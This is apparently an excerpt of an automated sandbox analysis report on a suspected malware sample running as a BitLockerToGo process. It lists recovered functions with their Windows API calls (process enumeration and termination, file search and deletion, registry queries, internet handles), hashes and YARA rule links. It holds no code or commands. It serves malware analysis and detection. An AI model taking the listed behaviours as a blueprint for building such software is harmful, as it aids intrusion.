                                                                                                                                                                                                                                      • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                                                                                                                                                                      • String ID: 5$#w
                                                                                                                                                                                                                                      • API String ID: 2353314856-2839390797
                                                                                                                                                                                                                                      • Opcode ID: de3cf71ae231f17c6ca11f97104110f1558a3bbb55a4956c25b9e2eb94521610
                                                                                                                                                                                                                                      • Instruction ID: 64367d38c3e9ced9b663f121cfad5eb10193654c5c05bcc0f317f9b618f818aa
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: de3cf71ae231f17c6ca11f97104110f1558a3bbb55a4956c25b9e2eb94521610
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F0F0EDB0302215AFE7A0CB1DDD85F6633E8DBCA304F440038AA04C7382DA34DE208765
                                                                                                                                                                                                                                      Function 004A32FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27processCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004A331D
                                                                                                                                                                                                                                      • Process32First.KERNEL32(00000000), ref: 004A332A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                                                                                                                                                                      • String ID: N-`
                                                                                                                                                                                                                                      • API String ID: 2353314856-3407581833
                                                                                                                                                                                                                                      • Opcode ID: d86fffb106dafd59a8d14215a986b40df6f6bd8c39278af1e72bef6567c134f1
                                                                                                                                                                                                                                      • Instruction ID: 479214ebc182d909c1277652c4982dd8f246edba8b7b9e85624db3a2d839dacd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d86fffb106dafd59a8d14215a986b40df6f6bd8c39278af1e72bef6567c134f1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1DE012713021555BD790DF6EDC86F5A36AD9F85748F094038B504DB392DA709C288755
                                                                                                                                                                                                                                      Function 004A36F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(?,00000000), ref: 004A36FE
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ProcessTerminate
                                                                                                                                                                                                                                      • String ID: 5$#w$5$#w
                                                                                                                                                                                                                                      • API String ID: 560597551-2883133298
                                                                                                                                                                                                                                      • Opcode ID: 1dd8bb87cfd49a0dca1ded49de8ecab023d8c03c3df6e08f521b3e0bcb301f40
                                                                                                                                                                                                                                      • Instruction ID: 08be19afeb65b8ab7c00f8551d3455fec7326bdac30a04e70589daab49b93131
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1dd8bb87cfd49a0dca1ded49de8ecab023d8c03c3df6e08f521b3e0bcb301f40
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3C04CE35450007BD1E29BD5EE82F3B23A4579DA80FA80415B321C3690D724D6115A1A
                                                                                                                                                                                                                                      Function 0048DF3F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 101fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 0048E049
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DeleteFile
                                                                                                                                                                                                                                      • String ID: $|X
                                                                                                                                                                                                                                      • API String ID: 4033686569-3892261830
                                                                                                                                                                                                                                      • Opcode ID: 95e2d53779694ca8aea9f57d7334c97154bbba286a798d888fdf02b751fe7dd5
                                                                                                                                                                                                                                      • Instruction ID: f6bbe64e5741182808ec9d90aab254fe09bea8ff3fdd3ca5bf0b8debbf7cd8ba
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95e2d53779694ca8aea9f57d7334c97154bbba286a798d888fdf02b751fe7dd5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 124171B6A011189BCB44CFACDC82EDCB7F5BF88304B098415E815E3325DB34AA15CF99
                                                                                                                                                                                                                                      Function 0048D684 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindNextFileA.KERNEL32(?,?), ref: 0048D775
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFindNext
                                                                                                                                                                                                                                      • String ID: $|X
                                                                                                                                                                                                                                      • API String ID: 2029273394-3892261830
                                                                                                                                                                                                                                      • Opcode ID: d21ce4f9b49f3078d3abf4c7679d9dac61d0493277e83a5f65940cbe17df9bbc
                                                                                                                                                                                                                                      • Instruction ID: 67d91448330ada2819b91b317cc4f7b5dfedc4271a6ac03f0952549d280854a9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d21ce4f9b49f3078d3abf4c7679d9dac61d0493277e83a5f65940cbe17df9bbc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5314DB69012089BCB50CFA8DC81EE9B7B5BF84304F05C929DC59A7215EB30BA58CF95
                                                                                                                                                                                                                                      Function 0049F8D3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,004D2E38,00000000,00020119), ref: 0049F939
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Open
                                                                                                                                                                                                                                      • String ID: 8.M
                                                                                                                                                                                                                                      • API String ID: 71445658-3595786555
                                                                                                                                                                                                                                      • Opcode ID: ee2b3fdaa481761d028afc3792ab00e38201a6518762bbd52fa6a0c4ed515777
                                                                                                                                                                                                                                      • Instruction ID: 42b147943cde90a19cf46cbd9503f18055d33832fe3cd1733e183a49fe7ef5c2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee2b3fdaa481761d028afc3792ab00e38201a6518762bbd52fa6a0c4ed515777
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39F022B1740104AFD248DB69DC86E3B379EEB84248F08403CF50AD7351E6B49C14C76C
                                                                                                                                                                                                                                      Function 004A95FF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000001,004D3D40,00000000,00020119,?), ref: 004A9660
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Open
                                                                                                                                                                                                                                      • String ID: @=M
                                                                                                                                                                                                                                      • API String ID: 71445658-3982369089
                                                                                                                                                                                                                                      • Opcode ID: 2986fce8efdfeaa6556079cc4d51795968948a814334ea17b6cb76224e91c09d
                                                                                                                                                                                                                                      • Instruction ID: f6ab446cd9e7708979406d6b289447f11b56349fbad942d43d6a982b54733831
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2986fce8efdfeaa6556079cc4d51795968948a814334ea17b6cb76224e91c09d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AAF022B2A002016FD314EBA9DC86EBB3B79EB91300F00003DB90A97341E624AE14C7B5
                                                                                                                                                                                                                                      Function 0049FDC1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(?,004D2E87,00000000,00020019,?), ref: 0049FE30
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Open
                                                                                                                                                                                                                                      • String ID: ?
                                                                                                                                                                                                                                      • API String ID: 71445658-1684325040
                                                                                                                                                                                                                                      • Opcode ID: b3e03052f7a11c5ecb35269ab0c35a8f6b71a72f13825adbe4e8a4613e02ec5e
                                                                                                                                                                                                                                      • Instruction ID: 83e6371f52577d1c1cfd1a694674dded9d3dc14b939ed721f70a56670c0908b2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3e03052f7a11c5ecb35269ab0c35a8f6b71a72f13825adbe4e8a4613e02ec5e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 120186B5A00204AFD3189F59EC94E6BBBE9FFC4345F05852EE84687391DB74A900CB55
                                                                                                                                                                                                                                      Function 0049EDD1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetVolumeInformationA.KERNEL32 ref: 0049EE12
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InformationVolume
                                                                                                                                                                                                                                      • String ID: C
                                                                                                                                                                                                                                      • API String ID: 2039140958-1037565863
                                                                                                                                                                                                                                      • Opcode ID: 69da35d717a640915474738572c0a28f945b52a872d85e2de6bf0c5329e49a0e
                                                                                                                                                                                                                                      • Instruction ID: 75e263899c5265e49a6cce0c634e114046061f24c87dc5667db303c7e783b3d2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 69da35d717a640915474738572c0a28f945b52a872d85e2de6bf0c5329e49a0e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A80175B1C583809FC340EF78DC9499ABBE5AFC4204F09D92DE49687321E774E695CB46
                                                                                                                                                                                                                                      Function 0049F1F3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,004D2DE4,00000000,00000000,?,?), ref: 0049F22B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: QueryValue
                                                                                                                                                                                                                                      • String ID: -M
                                                                                                                                                                                                                                      • API String ID: 3660427363-3430347614
                                                                                                                                                                                                                                      • Opcode ID: ab3672f94188a05fbf9b5c36a556c14dc8185e8ce994ab93a878866541196db4
                                                                                                                                                                                                                                      • Instruction ID: 521e8cb159c2b34953855921e23ff138523df82725245c5b1167c1d401bba3f0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab3672f94188a05fbf9b5c36a556c14dc8185e8ce994ab93a878866541196db4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4F0ECB26400085FC748DB48EC52D7AB79DEBA4214B05003AF948C7320E5A17C158725
                                                                                                                                                                                                                                      Function 004A34CE Relevance: 3.0, APIs: 2, Instructions: 27processCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004A34F0
                                                                                                                                                                                                                                      • Process32First.KERNEL32(00000000), ref: 004A34FD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2353314856-0
                                                                                                                                                                                                                                      • Opcode ID: 5141b7900f13df8117356af133ff53621a14921a63764087827e251091332367
                                                                                                                                                                                                                                      • Instruction ID: f8b4b453d57f429741c3e65c6ef73005fe36c18c432568c26310effd31ffdc94
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5141b7900f13df8117356af133ff53621a14921a63764087827e251091332367
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3EE09A70301205AFE7A08B1DEC92F6632E9EBC5748F140038B508CB381DB20EC208769
                                                                                                                                                                                                                                      Function 00490B38 Relevance: 1.6, APIs: 1, Instructions: 112fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindNextFileA.KERNEL32(?,?), ref: 00490C8F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFindNext
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2029273394-0
                                                                                                                                                                                                                                      • Opcode ID: 1348fe3468489c474d00852f7f955be3c841b61e1a861d7b4afeeaf59fb6d1aa
                                                                                                                                                                                                                                      • Instruction ID: 33eb3b523d349b094bebd399448a64226b6dfdfe5493d5113975148a5043bfd4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1348fe3468489c474d00852f7f955be3c841b61e1a861d7b4afeeaf59fb6d1aa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC412EB26001188FC784DFACEDD1E99B3B5EF98608F044164D916D7265EA34BF64CB8A
                                                                                                                                                                                                                                      Function 00486456 Relevance: 1.6, APIs: 1, Instructions: 87networkCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 0048645F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseHandleInternet
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1081599783-0
                                                                                                                                                                                                                                      • Opcode ID: 5ae1acb0671aa05805922fd359b9ceff9cdd8d8d775b17b3ce0705bc52f680d3
                                                                                                                                                                                                                                      • Instruction ID: aeb8965f39462017453df712ee30d50ba247c3357cad7094bd8133002fd7b0a5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ae1acb0671aa05805922fd359b9ceff9cdd8d8d775b17b3ce0705bc52f680d3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3531CAB7A01019EBCB84DB9CEC95EDC77B4FF947147051028E81AE3365DA31AE15CB88
                                                                                                                                                                                                                                      Function 00485053 Relevance: 1.6, APIs: 1, Instructions: 80networkCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 0048505D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseHandleInternet
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1081599783-0
                                                                                                                                                                                                                                      • Opcode ID: 1570d4c63d8c900862c32ec87b20a15b76a5c864aa4930ba08c508e1356f4f41
                                                                                                                                                                                                                                      • Instruction ID: 43d72452632787461892fdc25c142d3db4bc93a86f0b2e09e5427a553caed74b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1570d4c63d8c900862c32ec87b20a15b76a5c864aa4930ba08c508e1356f4f41
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC31F872A10029AFCB84EB9CEC85DDC77F4EF95718B440064E916E3264DA31AE55CBA8
                                                                                                                                                                                                                                      Function 0049FFEF Relevance: 1.6, APIs: 1, Instructions: 76registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,004D2ED3,00000000,?,?), ref: 004A00C5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: QueryValue
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3660427363-0
                                                                                                                                                                                                                                      • Opcode ID: 05780b2dd4faf2582446fcf59c601f758f584257df11f7cb869378cec6add143
                                                                                                                                                                                                                                      • Instruction ID: 9906b37d155a7b6c263affa102cf0bba0d70bb7e7d081eb72dea1ad01991f35b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 05780b2dd4faf2582446fcf59c601f758f584257df11f7cb869378cec6add143
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 242153723042059FD398DB5EDC91F6AB3EAAFD4204F08852EE556C3361DBB4E904CB59
                                                                                                                                                                                                                                      Function 0048764D Relevance: 1.6, APIs: 1, Instructions: 69networkCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InternetOpen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2038078732-0
                                                                                                                                                                                                                                      • Opcode ID: d1a10d63706bbd1f319266be5eb5aa3019a2741c232409ecd701d8b047164fa6
                                                                                                                                                                                                                                      • Instruction ID: 9da50f02b33fbbf75567be1c4680e041eecc5f178846d10076533929face5108
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d1a10d63706bbd1f319266be5eb5aa3019a2741c232409ecd701d8b047164fa6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5821A1B5A00205ABC740DF6CED85E9A77F9FFD8304B088168E815C7316EA70EE50CB99
                                                                                                                                                                                                                                      Function 00484468 Relevance: 1.6, APIs: 1, Instructions: 68networkCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004844FF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CrackInternet
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1381609488-0
                                                                                                                                                                                                                                      • Opcode ID: daa51f3091b8cd12b927137f38fe190be369c11fb6d4b0e250647f484c8da326
                                                                                                                                                                                                                                      • Instruction ID: e4603b7af526780b61effdbba2de2225624c2c27084d6862f762d38a8a342f5f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: daa51f3091b8cd12b927137f38fe190be369c11fb6d4b0e250647f484c8da326
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01112EB5610104AFDB84EF6DEC85EAA77E8EB89358B04403DE809D7311D738AE158B69
                                                                                                                                                                                                                                      Function 00494223 Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000001,004D2AD4,00000000,00000001,?), ref: 004942C2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Open
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                                                                                      • Opcode ID: 887e24d152094059a33b950ca218b66d9d07363ec5dad10af173ddd9985dd54c
                                                                                                                                                                                                                                      • Instruction ID: 89d8e0a85e1948a43131e351a5fc03f472c1d1ff461be9256676fa00935be686
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 887e24d152094059a33b950ca218b66d9d07363ec5dad10af173ddd9985dd54c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 151190B2C101246BD720DBA6DC89DDB3B7CEB85310F04007EF509D7240E6B59914CBE5
                                                                                                                                                                                                                                      Function 004931B8 Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindNextFileA.KERNELBASE(?,?), ref: 00493298
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFindNext
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2029273394-0
                                                                                                                                                                                                                                      • Opcode ID: e6743c7b8b579432eb907742f58be0ba70f816cea683c0216d6ee6f6737323f4
                                                                                                                                                                                                                                      • Instruction ID: a4fb9c7300af9fcfb712666a583d0372df629aced2564b55a0773b054a4f85f4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6743c7b8b579432eb907742f58be0ba70f816cea683c0216d6ee6f6737323f4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B212F72A007099FC745CF68DC81FD9B3B1FF88305F048629D95AD7211EB30BA688B95
                                                                                                                                                                                                                                      Function 004ABF5B Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindNextFileA.KERNELBASE(?,?), ref: 004AC012
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFindNext
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2029273394-0
                                                                                                                                                                                                                                      • Opcode ID: 980d8df5a15f0f4d5c606ffe86f5c4bf09c1b6a5d790e4bd371e4404cfda88ce
                                                                                                                                                                                                                                      • Instruction ID: 87bc675fe4e701fbd42ea8d8562af14faed71b9adca7a30bcbbeeae0c8359cea
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 980d8df5a15f0f4d5c606ffe86f5c4bf09c1b6a5d790e4bd371e4404cfda88ce
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A2102726143429BD354DF64DC90FAA73B5FFD4304F048A2CE85883221EB78B659CB95
                                                                                                                                                                                                                                      Function 004A8AD8 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindNextFileA.KERNELBASE(?,?), ref: 004A8B8D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFindNext
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2029273394-0
                                                                                                                                                                                                                                      • Opcode ID: 225ea3f2bf95ee537f0aaf2f02dd89ef60ffd176396fd61506ce49043b54078d
                                                                                                                                                                                                                                      • Instruction ID: d9105823654b99332030cdc77367eafff132f0148875fe6aef83435fae58edda
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 225ea3f2bf95ee537f0aaf2f02dd89ef60ffd176396fd61506ce49043b54078d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D621E775E00759CFDB51CF68C880BAAB7F0FB48200F01856AD959E7311E730AA85CF94
                                                                                                                                                                                                                                      Function 004A81A3 Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON
